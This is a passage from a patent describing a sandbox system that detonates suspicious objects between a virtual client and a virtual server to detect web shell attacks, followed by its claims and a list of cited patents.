In many embodiments, reporting logic 365 can be utilized to generate reports, emails, or other communications to an administrator informing her or him of the analytic results determined by the analyzer(s) within the one or more virtualized analysis systems deployed. In some embodiments, the reporting logic 365 may trigger a remedial action based on a predetermined rule set, which may include performing remediation activities including deleting or quarantining the object, blocking the object 170 from delivery to targeted network device or storage, and/or reconfiguring settings within a possibly infested network device to remediate the effects of any web shell attacks until the infected network device can be examined. In still further embodiments, the reporting logic 365 may be updated such that the format or frequency of communications in response to certain detected cybersecurity threats may change and thus yield a different response, especially as different cybersecurity threats as in different web shell attacks, are found to be more harmful or disruptive than others. In further embodiments, the reporting logic 365 may take remedial actions without human intervention.


III. Analyzer Systems

Referring now to FIG. 4, a first embodiment of a virtualized analysis system 400 is shown. The virtualized analysis system 400 features a single analyzer 420, which includes a virtual client 422 and virtual server 421. The analysis system 400 may be capable of generating a plurality of analyzers to evaluate and manipulate suspicious objects, where in some embodiments, the analyzers may be provisioned differently (e.g., different OS, application(s), scripting engine, etc.). Herein, the analyzer 420 may correspond to at least one virtual machine that attempts to open, process, or otherwise operate a suspicious object. In additional embodiments, the analyzer 420 provides a virtual (sandboxed) environment for processing of the suspicious object. In further additional embodiments, the analyzer 420 may generate a hash of the suspicious object for further comparison/analysis to avoid duplicative analysis of identical objects.


As further shown in FIG. 4, the analysis system 400 may generate a single analyzer 420 which is provisioned with the virtual server 421 and the virtual client 422. The virtual server 421 and virtual client 422 may be configured with a virtual communication link (or virtual connection) 425 between the virtual server 421 and the virtual client 422. Events based on operations conducted by the virtual server 421, operations conducted by the virtual client 422, and/or communications over the virtual communication link 425 between the virtual server 421 and virtual client 422 may be monitored by the monitoring logic 440. Commands may be deemed suspicious when these commands are unexpectedly encountered in communications exchanged between the virtual server 421 and virtual client 422 during processing of a suspicious object for analysis data. For example, suspicious commands may include, at least in part, those commands directed to unusual activities that influence operability or promote illicit exfiltration such as adjusting access privileges, downloading data maintained in storage locations designated for sensitive data, specific commands associated with a known web shell attack.


However, it is noted that the virtual client 422 may be configured to follow an orchestrated message transmission scheme that prompt transmission of suspicious commands. Also, the virtual client 422 may attempt to simulate a compromised client device within the appliance or customer network that is, by way of illustrative example, attempting to facilitate a cybersecurity attack on another device, including utilizing a web shell attack. Given knowledge of the orchestrated message transmission schemes, which may be part of the detection rules 342, the resultant commands from the virtual client 422 are expected and would not be viewed as suspicious commands in the analytics.


In certain cases, a cybersecurity attack such as a web shell attack may be triggered by a subsequent command being sent from the virtual client 422 to the virtual server 421. In these instances, monitoring the virtual communication link 425 by the monitoring logic 440 for commands indicative of web shell attacks may yield insights into the potential threat of a suspicious object. Typically, the suspicious object comprising web shell script can be loaded on a virtual server 421, either directly or from the virtual client 422. Herein, the virtualized analysis system 400 may comprise a detonator logic 430 which can aid in the determination of a suspicious object. For example, a web shell attack on a server may be triggered by an activity undertaken at the virtual client 422 such as user interface activity by the user or a web page being launched at the virtual client 422. As a result, the detonator logic 430 may be utilized to provide methods of triggering the suspicious object to determine if it is part of a web shell attack. By way of example and not limitation, the detonator logic 430 may direct the virtual client 422 to send a specific command into the virtual server 421. These commands may simulate interaction with graphical user elements such as a keyboard, mouse or touchpad or may be directed to commands that are utilized in known web shell attacks. As can be understood by those skilled in the art, the detonator logic 430 can provide a variety of methods to attempt to trigger a web shell attack.


It is contemplated that the analysis system 400 may be utilized in various embodiments including in a cybersecurity appliance or a cybersecurity agent. The cybersecurity appliance can be similar to the cybersecurity appliance 130 of FIG. 3 wherein the analyzer logic 350 generates an analysis system 400 utilizing a single analyzer 420 comprising a virtual server 421, virtual client 422, and a monitored virtual communication link 425 between them. In some embodiments, the analyzer comprises a single virtual machine configured to support operability of the virtual server 421, virtual client 422 and the virtual communication link 425. Similarly, the cybersecurity agent can be similar to the cybersecurity agent 125 of FIG. 2 in which the analysis system 225 operates as a virtual environment, which may include the single analyzer 420 including both the virtual client 422 and virtual server 421.


Referring to FIG. 5, a second embodiment of a virtualized analysis system 500 is shown. Unlike the single analyzer deployment in FIG. 4, the virtualized analysis system 500 includes a first analyzer 510 that features a virtual server 511 and a second analyzer 520 that features a virtual client 512. In contrast to the embodiments described in FIG. 4, many embodiments may exist where the virtual server 511 and virtual client 512 are generated on separate analyzers 510, 520. In these embodiments, a virtual communication link 540 may still be instantiated to simulate a physical communication link between a server and a client device. Likewise, a detonator logic 530 can be employed to attempt to trigger activation of a potential web shell script within a suspicious object loaded into either the first analyzer 510 or the second analyzer 520.


It is contemplated that many aspects related to the virtual resources within the virtual analysis system 400 of FIG. 4 are applicable to the virtualized analysis system 500 of FIG. 5. In other words, the virtual server 511, the virtual client 512, the detonator logic 530 and the monitoring logic 540 operate in a similar manner as described in FIG. 4. Similarly, it is also contemplated that various embodiments of the analysis system 500 may be incorporated into one or more cybersecurity appliances and/or cybersecurity agents. Further, the analysis system 500 may be generated by the analyzer logic 350 found within a cybersecurity appliance such as the cybersecurity appliance as taught in FIG. 3. Finally, it would be understood by those skilled in the art that the virtual communication link 540 may be accomplished in a number of ways, including, but not limited to, standard object configured to pass calls to both the virtual server 511 and the virtual client 512.


Although not shown, the cybersecurity system may be provided as a cloud service where the virtual analysis system may be a collection of virtual resources (e.g., one or more virtual compute engines, one or more virtual data stores, etc.) that are not instantiated anew for each object submitted for analysis. In contrast, the virtual analysis systems may be persistent (e.g., long lived and in “hot standby”), awaiting detonation in which communications between some of these virtual resources are conducted to configured to provide a virtual server and a virtual client matching the profile needed to detonate the suspicious object. The rules associated with the detonation technique (i.e. orchestrated communications, etc.) may be maintained within one of the virtual data stores.


IV. Server Attack Detection Process

Referring now to FIG. 6, an exemplary embodiment of a flowchart illustrating a process of detecting cyberattacks on servers utilizing an analyzer that features both a virtual client and a virtual server is shown. In many embodiments, the process 600 begins by inspecting various objects received and inspected by a cybersecurity system (block 610). In certain embodiments, the cybersecurity system may be implemented as an cybersecurity appliance or as a cybersecurity agent. Herein, the inspection may be conducted as a rule-based inspection where compliance or non-compliance with certain rules may be used to determine whether the received object is suspicious. These detection rules may be adjusted based on cybersecurity threat landscape. By way of example and not limitation, one of the detection rules may consider detection of an object under analysis including a script file (e.g., PHP, ASP, or JSP file), the object is labeled “suspicious” and is subsequently loaded into the virtualized analysis system for analysis.


Once an object is deemed “suspicious”, the suspicious object may be tagged for subsequent loading into a virtualized analysis system provisioned for processing suspicious objects (block 615). Additionally, a virtualized analysis system is created and provisioned to process the suspicious object further evaluation (blocks 620 and 630). In particular, the virtualized analysis system is provisioned to include a software representation of a server (virtual server), a software representation of a client device (virtual client), and a software representation of a communication link between the virtual server and the virtual client (virtual communication link). The virtualized analysis system may be further provisioned with detonator logic, which is configured to initiate processing of the susplicious object, when loaded into the virtual server and orchestrate communications between the virtual client and the virtual server (e.g., coordinates transmission of commands from the virtual client, coordinates responding to the commands, etc.) that may prompt the suspicious object to perform unexpected, abnormal or inconsistent events indicative of a cybersecurity threat such as a web shell attack.


When the virtual server and virtual client are instantiated as part of the virtualized analysis system, the supicious object loaded into the virtual server (block 640). After the suspicious object is loaded into the virtual server, the detonator logic commences and controls a prescribed interaction (i.e., communications) between the virtual server and the virtual client in attempts to trigger the suspicious object (block 650). These communications may be an orchestated exchange or sequence of messages (e.g., commands, data or control information, etc.). During these communications, monitoring logic is configured to monitor and log information propagating over the virtual communication link between the virtual server and the virtual client. The information may include commands or other activity indicative of a web shell attack (block 660).


Thereafter, analytics are performed on the monitored and logged information to determine whether the logged information includes events that are indicative of a web shell attack. In certain embodiments, the monitored communication and results observed can be correlated to generate a threat assessment score indicative of a threat level (block 670). In response to the threat assessment score being generated, the process 600 evaluates that threat assessment score to determine if it is above a particular threshold, where the threshold may be static based on the type of suspicious activity being analyzed or dynamic based on the recent cybersecurity threat activity (block 680). When the threat assessment score is not above the threshold, the process 600 can end (block 695). When a threat assessment score exceeds a given threshold, at least one responsive action may be taken by the cybersecurity system such as a cybersecurity appliance or a cybersecurity agent (block 690). In some cases, the responsive action is a remedial action to counter the potential threat which may include, but is not limited to, deleting the threatening data, quarantining the threatening data, or generating a report to] administrator regarding the nature of the threat for further action.


In the foregoing description, the invention is described with reference to specific embodiments thereof. It will, however, be evident that various modifications and changes may be made thereto without departing from the broader spirit and scope of the invention as set forth in the appended claims.

Claims
  • 1. An electronic device for detecting threats within a server, comprising: a processor; anda non-transitory storage medium communicatively coupled to the processor, the non-transitory storage medium including logic executed by the processor, the logic comprises an inspection logic to receive a suspicious object for threat evaluation,an analyzer logic to generate an analysis system comprising a first analyzer including a virtual client and a second analyzer including a virtual server, wherein a virtual communication link is established between the virtual client of the first analyzer and the virtual server of the second analyzer, wherein the received suspicious object is loaded into the virtual client of the first analyzer, anda detonator logic to trigger the suspicious object within the virtual client,wherein the analysis system monitors at least data transferred on the virtual communication link and generates a first threat score based upon the monitored data transferred over the virtual communication link.
  • 2. The electronic device of claim 1, wherein the non-transitory storage medium further comprises: a static analysis logic to analyze the suspicious object and generate a second threat score based on an analysis of the suspicious object; anda correlation logic to receive the first threat score, the second threat score, and correlate the first threat score and the second threat score to generate an overall threat score.
  • 3. The electronic device of claim 2, wherein the non-transitory storage medium further comprises: a reporting logic that compares the overall threat score to at least one threshold and in response to the overall threat score exceeding the at least one threshold, generating at least one remedial action.
  • 4. The electronic device of claim 1, wherein the analysis system further monitors a first end state of the virtual client of the first analyzer and a second end state of the virtual server of the second analyzer and generates a first threat score based upon the monitored data, the first end state, and the second end state.
  • 5. The electronic device of claim 1, wherein the monitored data is scored based on commands sent from the virtual client of the first analyzer to the virtual server of the second analyzer indicative of a web shell attack.
  • 6. The electronic device of claim 1, wherein the triggering of the suspicious object comprises inputting user commands on the virtual client indicative of cybersecurity attacks.
  • 7. A cybersecurity software agent stored within a non-transitory storage medium and configured, upon exection, to detect threats within a server, the cybersecurity software agent comprising: an inspection logic stored within the non-transitory storage medium, the inspection logic, when executed, is configured to receive a suspicious object for threat evaluation;an analyzer logic stored within the non-transitory storage medium, the anayzer logic, when executed, is configured to generate an analysis system comprising a first analyzer with a virtual client and a second analyzer with a virtual server, wherein a virtual communication link is established between the virtual client of the first analyzer and virtual server of the second analyzer, wherein the received suspicious object is loaded into the virtual client; anda detonator logic stored within the non-transitory storage medium, the detonator logic, when executed, is configured to trigger the suspicious object,wherein the analysis system is further configured to monitor data transferred on the virtual communication link and generate a first threat score based upon the monitored data transferred over the virtual communication link.
  • 8. The cybersecurity software agent of claim 7, wherein the non-transitory storage medium configured to store the cybersecurity software agent further comprises: a static analysis logic to analyze the suspicious object and generate a second threat score based on the analysis of the suspicious object; anda correlation logic to receive the first threat score, the second threat score, and correlate the first threat score and second threat score to generate an overall threat score.
  • 9. The cybersecurity software agent of claim 8, wherein the non-transitory storage medium configured to store the cybersecurity software agent further comprises: a reporting logic that compares the overall threat score to at least one threshold and in response to the overall threat score exceeding the at least one threshold, generating at least one remedial action.
  • 10. The cybersecurity software agent of claim 7, wherein the analysis system further monitors a first end state of the virtual client of the first analyzer and a second end state of the virtual server of the second analyzer and generates a first threat score based upon the monitored data, the first end state, and the second end state.
  • 11. The cybersecurity software agent of claim 7, wherein the monitored data is scored based on commands sent from the virtual client of the first analyzer to the virtual server of the second analyzer indicative of a web shell attack.
  • 12. The cybersecurity software agent of claim 7, wherein the triggering of the suspicious object comprises inputting user commands on the virtual client indicative of cybersecurity attacks.
  • 13. A cybersecurity software agent stored within a non-transitory storage medium and configured, upon exection, to detect threats within a server, the cybersecurity software agent comprising: an analysis system stored within the non-transitory storage medium, the analysis system comprising one or more analyzers including a virtual client and a virtual server, wherein a virtual communication link is established between the virtual client and the virtual server, wherein a suspicious object under analysis is loaded into the virtual client; anda detonator logic stored within the non-transitory storage medium, the detonator logic is configured to trigger the suspicious object,wherein the analysis system is further configured to monitor data transferred on the virtual communication link and generate a first threat score based upon the monitored data transferred over the virtual communication link.
  • 14. The cybersecurity software agent claim 13, wherein the analysis system monitors events associated with operations of the virtual server or the virtual client or both the virtual server and the virtual client.
  • 15. The cybersecurity software agent of claim 13, wherein the non-transitory storage medium configured to store the cybersecurity software agent further comprises: a static analysis logic to analyze the suspicious object and generate a second threat score based on the analysis of the suspicious object; anda correlation logic to receive the first threat score, the second threat score, and correlate the first threat score and second threat score to generate an overall threat score.
  • 16. The cybersecurity software agent of claim 15, wherein the non-transitory storage medium configured to store the cybersecurity software agent further comprises: a reporting logic that compares the overall threat score to at least one threshold and in response to the overall threat score exceeding the at least one threshold, generating at least one remedial action.
  • 17. The cybersecurity software agent of claim 7, wherein the analysis system comprises a first analyzer with the virtual client and a second analyzer with the virtual server, the analysis system further monitors a first end state of the virtual client of the first analyzer and a second end state of the virtual server of the second analyzer and generates a first threat score based upon the monitored data, the first end state, and the second end state.
  • 18. The electronic device of claim 1, wherein the analysis system monitors events associated with operations of the virtual server or the virtual client or both the virtual server and the virtual client.
CROSS REFERENCE TO RELATED APPLICATIONS

This application is based upon and claims the benefit of priority from U.S. Provisional Patent Application No. 62/826,875 filed Mar. 29, 2019, the entire contents of which are incorporated herein by reference.

US Referenced Citations (483)
Number Name Date Kind
6898632 Gordy et al. May 2005 B2
6941348 Petry et al. Sep 2005 B2
7080407 Zhao et al. Jul 2006 B1
7080408 Pak et al. Jul 2006 B1
7243371 Kasper et al. Jul 2007 B1
7308716 Danford et al. Dec 2007 B2
7448084 Apap et al. Nov 2008 B1
7458098 Judge et al. Nov 2008 B2
7467408 O'Toole, Jr. Dec 2008 B1
7496961 Zimmer et al. Feb 2009 B2
7519990 Xie Apr 2009 B1
7540025 Tzadikario May 2009 B2
7639714 Stolfo et al. Dec 2009 B2
7698548 Shelest et al. Apr 2010 B2
7779463 Stolfo et al. Aug 2010 B2
7854007 Sprosts et al. Dec 2010 B2
7937387 Frazier et al. May 2011 B2
7949849 Lowe et al. May 2011 B2
8006305 Aziz Aug 2011 B2
8020206 Hubbard et al. Sep 2011 B2
8045458 Alperovitch et al. Oct 2011 B2
8069484 McMillan et al. Nov 2011 B2
8171553 Aziz et al. May 2012 B2
8201246 Wu et al. Jun 2012 B1
8204984 Aziz et al. Jun 2012 B1
8214905 Doukhvalov et al. Jul 2012 B1
8291499 Aziz et al. Oct 2012 B2
8370938 Daswani et al. Feb 2013 B1
8370939 Zaitsev et al. Feb 2013 B2
8375444 Viz et al. Feb 2013 B2
8438644 Watters et al. May 2013 B2
8464340 Ahn et al. Jun 2013 B2
8494974 Watters et al. Jul 2013 B2
8516593 Aziz Aug 2013 B2
8528086 Aziz Sep 2013 B1
8539582 Aziz et al. Sep 2013 B1
8549638 Aziz Oct 2013 B2
8561177 Aziz et al. Oct 2013 B1
8566476 Shiffer et al. Oct 2013 B2
8566946 Aziz et al. Oct 2013 B1
8584239 Aziz et al. Nov 2013 B2
8635696 Aziz Jan 2014 B1
8689333 Aziz Apr 2014 B2
8713681 Silberman et al. Apr 2014 B2
8776229 Aziz Jul 2014 B1
8793278 Frazier et al. Jul 2014 B2
8793787 Ismael et al. Jul 2014 B2
8813050 Watters et al. Aug 2014 B2
8832829 Manni et al. Sep 2014 B2
8850571 Staniford et al. Sep 2014 B2
8881271 Butler, II Nov 2014 B2
8881282 Aziz et al. Nov 2014 B1
8898788 Aziz et al. Nov 2014 B1
8935779 Manni et al. Jan 2015 B2
8949257 Shiffer et al. Feb 2015 B2
8984638 Aziz et al. Mar 2015 B1
8990939 Staniford et al. Mar 2015 B2
8990944 Singh et al. Mar 2015 B1
8997219 Staniford et al. Mar 2015 B2
9009822 Ismael et al. Apr 2015 B1
9009823 Ismael et al. Apr 2015 B1
9015846 Watters et al. Apr 2015 B2
9027135 Aziz May 2015 B1
9071638 Aziz et al. Jun 2015 B1
9104867 Thioux et al. Aug 2015 B1
9106630 Frazier et al. Aug 2015 B2
9106694 Aziz et al. Aug 2015 B2
9118715 Staniford et al. Aug 2015 B2
9159035 Ismael et al. Oct 2015 B1
9171160 Vincent et al. Oct 2015 B2
9176843 Ismael et al. Nov 2015 B1
9189627 Islam Nov 2015 B1
9195829 Goradia et al. Nov 2015 B1
9197664 Aziz et al. Nov 2015 B1
9223972 Vincent et al. Dec 2015 B1
9225740 Ismael et al. Dec 2015 B1
9241010 Bennett et al. Jan 2016 B1
9251343 Vincent et al. Feb 2016 B1
9262635 Paithane et al. Feb 2016 B2
9268936 Butler Feb 2016 B2
9275229 LeMasters Mar 2016 B2
9282109 Aziz et al. Mar 2016 B1
9292686 Ismael et al. Mar 2016 B2
9294501 Mesdaq et al. Mar 2016 B2
9300686 Pidathala et al. Mar 2016 B2
9306960 Aziz Apr 2016 B1
9306974 Aziz et al. Apr 2016 B1
9311479 Manni et al. Apr 2016 B1
9355247 Thioux et al. May 2016 B1
9356944 Aziz May 2016 B1
9363280 Rivlin et al. Jun 2016 B1
9367681 Ismael et al. Jun 2016 B1
9398028 Karandikar et al. Jul 2016 B1
9413781 Cunningham et al. Aug 2016 B2
9426071 Caldejon et al. Aug 2016 B1
9430646 Mushtaq et al. Aug 2016 B1
9432389 Khalid et al. Aug 2016 B1
9438613 Paithane et al. Sep 2016 B1
9438622 Staniford et al. Sep 2016 B1
9438623 Thioux et al. Sep 2016 B1
9459901 Jung et al. Oct 2016 B2
9467460 Otvagin et al. Oct 2016 B1
9483644 Paithane et al. Nov 2016 B1
9495180 Ismael Nov 2016 B2
9497213 Thompson et al. Nov 2016 B2
9507935 Ismael et al. Nov 2016 B2
9516057 Aziz Dec 2016 B2
9519782 Aziz et al. Dec 2016 B2
9536091 Paithane et al. Jan 2017 B2
9537972 Edwards et al. Jan 2017 B1
9560059 Islam Jan 2017 B1
9565202 Kindlund et al. Feb 2017 B1
9591015 Amin et al. Mar 2017 B1
9591020 Aziz Mar 2017 B1
9594904 Jain et al. Mar 2017 B1
9594905 Ismael et al. Mar 2017 B1
9594912 Thioux et al. Mar 2017 B1
9609007 Rivlin et al. Mar 2017 B1
9626509 Khalid et al. Apr 2017 B1
9628498 Aziz et al. Apr 2017 B1
9628507 Haq et al. Apr 2017 B2
9633134 Ross Apr 2017 B2
9635039 Islam et al. Apr 2017 B1
9641546 Manni et al. May 2017 B1
9654485 Neumann May 2017 B1
9661009 Karandikar et al. May 2017 B1
9661018 Aziz May 2017 B1
9674298 Edwards et al. Jun 2017 B1
9680862 Ismael et al. Jun 2017 B2
9690606 Ha et al. Jun 2017 B1
9690933 Singh et al. Jun 2017 B1
9690935 Shiffer et al. Jun 2017 B2
9690936 Malik et al. Jun 2017 B1
9736179 Ismael Aug 2017 B2
9740857 Ismael et al. Aug 2017 B2
9747446 Pidathala et al. Aug 2017 B1
9749343 Watters et al. Aug 2017 B2
9749344 Watters et al. Aug 2017 B2
9756074 Aziz Sep 2017 B2
9773112 Rathor et al. Sep 2017 B1
9781144 Otvagin et al. Oct 2017 B1
9787700 Amin et al. Oct 2017 B1
9787706 Otvagin et al. Oct 2017 B1
9792196 Ismael et al. Oct 2017 B1
9824209 Ismael et al. Nov 2017 B1
9824211 Wilson Nov 2017 B2
9824216 Khalid et al. Nov 2017 B1
9825976 Gomez et al. Nov 2017 B1
9825989 Mehra et al. Nov 2017 B1
9838408 Karandikar et al. Dec 2017 B1
9838411 Aziz Dec 2017 B1
9838416 Aziz Dec 2017 B1
9838417 Khalid et al. Dec 2017 B1
9846776 Paithane et al. Dec 2017 B1
9876701 Caldejon et al. Jan 2018 B1
9888016 Amin et al. Feb 2018 B1
9888019 Pidathala et al. Feb 2018 B1
9892261 Joram et al. Feb 2018 B2
9904955 Watters et al. Feb 2018 B2
9910988 Vincent et al. Mar 2018 B1
9912644 Cunningham Mar 2018 B2
9912681 Ismael et al. Mar 2018 B1
9912684 Aziz et al. Mar 2018 B1
9912691 Mesdaq et al. Mar 2018 B2
9912698 Thioux et al. Mar 2018 B1
9916440 Paithane et al. Mar 2018 B1
9921978 Chan et al. Mar 2018 B1
9934376 Ismael Apr 2018 B1
9934381 Kindlund et al. Apr 2018 B1
9946568 Ismael et al. Apr 2018 B1
9954890 Staniford et al. Apr 2018 B1
9973531 Thioux May 2018 B1
10002252 Ismael et al. Jun 2018 B2
10019338 Goradia et al. Jul 2018 B1
10019573 Silberman et al. Jul 2018 B2
10025691 Ismael et al. Jul 2018 B1
10025927 Khalid et al. Jul 2018 B1
10027689 Rathor et al. Jul 2018 B1
10027690 Aziz et al. Jul 2018 B2
10027696 Rivlin et al. Jul 2018 B1
10033747 Paithane et al. Jul 2018 B1
10033748 Cunningham et al. Jul 2018 B1
10033753 Islam et al. Jul 2018 B1
10033759 Kabra et al. Jul 2018 B1
10050998 Singh Aug 2018 B1
10063583 Watters et al. Aug 2018 B2
10068091 Aziz et al. Sep 2018 B1
10075455 Zafar et al. Sep 2018 B2
10083302 Paithane et al. Sep 2018 B1
10084813 Eyada Sep 2018 B2
10089461 Ha et al. Oct 2018 B1
10097573 Aziz Oct 2018 B1
10104102 Neumann Oct 2018 B1
10108446 Steinberg et al. Oct 2018 B1
10121000 Rivlin et al. Nov 2018 B1
10122746 Manni et al. Nov 2018 B1
10133863 Bu et al. Nov 2018 B2
10133866 Kumar et al. Nov 2018 B1
10146810 Shiffer et al. Dec 2018 B2
10148693 Singh et al. Dec 2018 B2
10165000 Aziz et al. Dec 2018 B1
10169585 Pilipenko et al. Jan 2019 B1
10176321 Abbasi et al. Jan 2019 B2
10181029 Ismael et al. Jan 2019 B1
10191861 Steinberg et al. Jan 2019 B1
10192052 Singh et al. Jan 2019 B1
10198574 Thioux et al. Feb 2019 B1
10200384 Mushtaq et al. Feb 2019 B1
10210329 Malik et al. Feb 2019 B1
10216927 Steinberg Feb 2019 B1
10218740 Mesdaq et al. Feb 2019 B1
10242185 Goradia Mar 2019 B1
10282548 Aziz et al. May 2019 B1
10284574 Aziz et al. May 2019 B1
10284575 Paithane et al. May 2019 B2
10296437 Ismael et al. May 2019 B2
10335738 Paithane et al. Jul 2019 B1
10341363 Vincent et al. Jul 2019 B1
10341365 Ha Jul 2019 B1
10366231 Singh et al. Jul 2019 B1
10380343 Jung et al. Aug 2019 B1
10395029 Steinberg Aug 2019 B1
10404725 Rivlin et al. Sep 2019 B1
10417031 Paithane et al. Sep 2019 B2
10430586 Paithane et al. Oct 2019 B1
10432649 Bennett et al. Oct 2019 B1
10445502 Desphande Oct 2019 B1
10447728 Steinberg Oct 2019 B1
10454950 Aziz Oct 2019 B1
10454953 Amin et al. Oct 2019 B1
10462173 Aziz et al. Oct 2019 B1
10467411 Pidathala et al. Nov 2019 B1
10467414 Kindlund et al. Nov 2019 B1
10469512 Ismael Nov 2019 B1
10474813 Ismael Nov 2019 B1
10476906 Siddiqui Nov 2019 B1
10476909 Aziz et al. Nov 2019 B1
10491627 Su Nov 2019 B1
10503904 Singh et al. Dec 2019 B1
10505956 Pidathala et al. Dec 2019 B1
10511614 Aziz Dec 2019 B1
10515214 Vincent et al. Dec 2019 B1
10523609 Subramanian Dec 2019 B1
10528726 Ismael Jan 2020 B1
10534906 Paithane et al. Jan 2020 B1
10552610 Vashisht et al. Feb 2020 B1
10554507 Siddiqui et al. Feb 2020 B1
10565378 Vincent et al. Feb 2020 B1
10567405 Aziz Feb 2020 B1
10572665 Jung et al. Feb 2020 B2
10581874 Khalid et al. Mar 2020 B1
10581879 Paithane et al. Mar 2020 B1
10581898 Singh Mar 2020 B1
10587636 Aziz et al. Mar 2020 B1
10587647 Khalid et al. Mar 2020 B1
10592678 Ismael et al. Mar 2020 B1
10601848 Jeyaraman et al. Mar 2020 B1
10601863 Siddiqui Mar 2020 B1
10601865 Mesdaq et al. Mar 2020 B1
10616266 Otvagin Apr 2020 B1
10621338 Pfoh et al. Apr 2020 B1
10623434 Aziz et al. Apr 2020 B1
10637880 Islam et al. Apr 2020 B1
10642753 Steinberg May 2020 B1
10657251 Malik et al. May 2020 B1
10666686 Singh et al. May 2020 B1
10671721 Otvagin et al. Jun 2020 B1
10671726 Paithane et al. Jun 2020 B1
10701091 Cunningham et al. Jun 2020 B1
10706149 Vincent Jul 2020 B1
10713358 Sikorski et al. Jul 2020 B2
10713362 Vincent et al. Jul 2020 B1
10715542 Wei et al. Jul 2020 B1
10726127 Steinberg Jul 2020 B1
10728263 Neumann Jul 2020 B1
10735458 Haq et al. Aug 2020 B1
10740456 Ismael et al. Aug 2020 B1
10747872 Ha et al. Aug 2020 B1
10757120 Aziz et al. Aug 2020 B1
10757134 Eyada Aug 2020 B1
10785255 Otvagin et al. Sep 2020 B1
10791138 Siddiqui et al. Sep 2020 B1
10795991 Ross et al. Oct 2020 B1
10798112 Siddiqui et al. Oct 2020 B2
10798121 Khalid et al. Oct 2020 B1
10805340 Goradia Oct 2020 B1
10805346 Kumar et al. Oct 2020 B2
10812513 Manni et al. Oct 2020 B1
10817606 Vincent Oct 2020 B1
10826931 Quan et al. Nov 2020 B1
10826933 Ismael et al. Nov 2020 B1
10834107 Paithane et al. Nov 2020 B1
10846117 Steinberg Nov 2020 B1
10848397 Siddiqui et al. Nov 2020 B1
10848521 Thioux et al. Nov 2020 B1
10855700 Jeyaraman et al. Dec 2020 B1
10868818 Rathor et al. Dec 2020 B1
10872151 Kumar et al. Dec 2020 B1
10873597 Mehra et al. Dec 2020 B1
10887328 Paithane et al. Jan 2021 B1
10893059 Aziz et al. Jan 2021 B1
10893068 Khalid et al. Jan 2021 B1
10902117 Singh et al. Jan 2021 B1
10902119 Vashisht et al. Jan 2021 B1
10904286 Liu Jan 2021 B1
10929266 Goradia et al. Feb 2021 B1
20020038430 Edwards et al. Mar 2002 A1
20020091819 Melchione et al. Jul 2002 A1
20020095607 Lin-Hendel Jul 2002 A1
20020169952 DiSanto et al. Nov 2002 A1
20020184528 Shevenell et al. Dec 2002 A1
20020188887 Largman et al. Dec 2002 A1
20030084318 Schertz May 2003 A1
20030188190 Aaron et al. Oct 2003 A1
20030191957 Hypponen et al. Oct 2003 A1
20040015712 Szor Jan 2004 A1
20040019832 Arnold et al. Jan 2004 A1
20040117478 Triulzi et al. Jun 2004 A1
20040117624 Brandt et al. Jun 2004 A1
20040236963 Danford et al. Nov 2004 A1
20040255161 Cavanaugh Dec 2004 A1
20040268147 Wiederin et al. Dec 2004 A1
20050021740 Bar et al. Jan 2005 A1
20050086523 Zimmer et al. Apr 2005 A1
20050091513 Mitomo et al. Apr 2005 A1
20050108562 Khazan et al. May 2005 A1
20050125195 Brendel Jun 2005 A1
20050149726 Joshi et al. Jul 2005 A1
20050157662 Bingham et al. Jul 2005 A1
20050238005 Chen et al. Oct 2005 A1
20050262562 Gassoway Nov 2005 A1
20050283839 Cowburn Dec 2005 A1
20060010495 Cohen et al. Jan 2006 A1
20060015715 Anderson Jan 2006 A1
20060015747 Van de Ven Jan 2006 A1
20060021029 Brickell et al. Jan 2006 A1
20060031476 Mathes et al. Feb 2006 A1
20060070130 Costea et al. Mar 2006 A1
20060117385 Mester et al. Jun 2006 A1
20060123477 Raghavan et al. Jun 2006 A1
20060150249 Gassen et al. Jul 2006 A1
20060161987 Levy-Yurista Jul 2006 A1
20060173992 Weber et al. Aug 2006 A1
20060191010 Benjamin Aug 2006 A1
20060242709 Seinfeld et al. Oct 2006 A1
20060251104 Koga Nov 2006 A1
20060288417 Bookbinder et al. Dec 2006 A1
20070006288 Mayfield et al. Jan 2007 A1
20070006313 Porras et al. Jan 2007 A1
20070011174 Takaragi et al. Jan 2007 A1
20070016951 Piccard et al. Jan 2007 A1
20070064689 Shin et al. Mar 2007 A1
20070143827 Nicodemus et al. Jun 2007 A1
20070157306 Elrod et al. Jul 2007 A1
20070192858 Lum Aug 2007 A1
20070208822 Wang et al. Sep 2007 A1
20070240218 Tuvell et al. Oct 2007 A1
20070240220 Tuvell et al. Oct 2007 A1
20070240222 Tuvell et al. Oct 2007 A1
20070250930 Aziz et al. Oct 2007 A1
20080005782 Aziz Jan 2008 A1
20080040710 Chiriac Feb 2008 A1
20080072326 Danford et al. Mar 2008 A1
20080077793 Tan et al. Mar 2008 A1
20080134334 Kim et al. Jun 2008 A1
20080141376 Clausen et al. Jun 2008 A1
20080184367 McMillan et al. Jul 2008 A1
20080189787 Arnold et al. Aug 2008 A1
20080307524 Singh et al. Dec 2008 A1
20080320594 Jiang Dec 2008 A1
20090003317 Kasralikar et al. Jan 2009 A1
20090064332 Porras et al. Mar 2009 A1
20090083855 Apap et al. Mar 2009 A1
20090125976 Wassermann et al. May 2009 A1
20090126015 Monastyrsky et al. May 2009 A1
20090144823 Lamastra et al. Jun 2009 A1
20090158430 Borders Jun 2009 A1
20090172815 Gu et al. Jul 2009 A1
20090198651 Shiffer et al. Aug 2009 A1
20090198670 Shiffer et al. Aug 2009 A1
20090198689 Frazier et al. Aug 2009 A1
20090199274 Frazier et al. Aug 2009 A1
20090241190 Todd et al. Sep 2009 A1
20090300589 Watters et al. Dec 2009 A1
20100017546 Poo et al. Jan 2010 A1
20100030996 Butler, II Feb 2010 A1
20100058474 Hicks Mar 2010 A1
20100077481 Polyakov et al. Mar 2010 A1
20100115621 Staniford et al. May 2010 A1
20100132038 Zaitsev May 2010 A1
20100154056 Smith et al. Jun 2010 A1
20100192223 Ismael et al. Jul 2010 A1
20100281542 Stolfo et al. Nov 2010 A1
20110078794 Manni et al. Mar 2011 A1
20110093951 Aziz Apr 2011 A1
20110099633 Aziz Apr 2011 A1
20110099635 Silberman et al. Apr 2011 A1
20110167493 Song et al. Jul 2011 A1
20110173213 Frazier et al. Jul 2011 A1
20110178942 Watters et al. Jul 2011 A1
20110219450 McDougal et al. Sep 2011 A1
20110225624 Sawhney et al. Sep 2011 A1
20110247072 Staniford et al. Oct 2011 A1
20110307954 Melnik et al. Dec 2011 A1
20110307955 Kaplan et al. Dec 2011 A1
20110307956 Yermakov et al. Dec 2011 A1
20110314546 Aziz et al. Dec 2011 A1
20120117652 Manni et al. May 2012 A1
